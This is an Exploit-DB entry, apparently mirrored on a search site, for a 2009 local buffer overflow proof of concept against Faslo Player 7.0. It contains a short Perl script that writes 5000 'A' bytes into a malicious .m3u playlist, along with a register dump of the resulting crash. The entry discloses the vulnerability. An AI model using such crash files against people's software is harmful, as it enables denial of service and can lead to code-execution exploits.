Lucene search

K
exploitdbHack4loveEDB-ID:9487
HistoryAug 24, 2009 - 12:00 a.m.

Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)

2009-08-2400:00:00
hack4love
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

#!/usr/bin/perl
# Found By :: HACK4LOVE
# [email protected]
# Faslo Player 7.0 (.m3u) Local Buffer Overflow PoC
# http://www.rspq.org/faslo/fs7setup.exe
############################################################
##EAX 41414141
##ECX 004A7CB0 faslow.004A7CB0
##EDX 00145920
##EBX 00000000
##ESP 0012F5B0
##EBP 0012FC84
##ESI 003F9BC9
##EDI 003F9BC9
##EIP 73DD526E MFC42.73DD526E
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################

# milw0rm.com [2009-08-24]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9487